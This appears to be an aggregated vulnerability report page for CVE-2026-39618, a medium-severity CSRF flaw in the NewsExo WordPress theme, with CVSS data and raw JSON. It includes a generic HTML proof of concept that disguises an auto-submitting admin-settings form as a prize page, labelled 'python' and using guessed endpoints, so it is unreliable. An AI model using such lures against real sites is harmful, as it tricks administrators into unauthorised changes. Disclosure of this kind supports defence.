Security Vulnerability Report
中文
CVE-2026-39618 CVSS 4.3 MEDIUM

CVE-2026-39618

Published: 2026-04-08 09:16:32
Last Modified: 2026-04-24 18:06:59

Description

Cross-Site Request Forgery (CSRF) vulnerability in themearile NewsExo newsexo allows Cross Site Request Forgery.This issue affects NewsExo: from n/a through <= 7.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

NewsExo <= 7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-39618 (NewsExo CSRF) Description: This HTML page demonstrates how an attacker could trigger a state-changing request on behalf of an authenticated admin. Usage: Host this file and send the link to a logged-in admin. --> <html> <body> <h1>You have won a prize! Click to claim.</h1> <!-- Replace 'action' and input names with actual vulnerable endpoints/parameters if known --> <form action="http://target-site/wp-admin/admin.php?page=newsexo_settings" method="POST"> <input type="hidden" name="option_name" value="malicious_config_value" /> <input type="submit" value="Claim Prize" /> </form> <script> // Auto-submit the form to maximize exploit success document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39618", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:31.730", "lastModified": "2026-04-24T18:06:58.907", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in themearile NewsExo newsexo allows Cross Site Request Forgery.This issue affects NewsExo: from n/a through <= 7.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/newsexo/vulnerability/wordpress-newsexo-theme-7-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}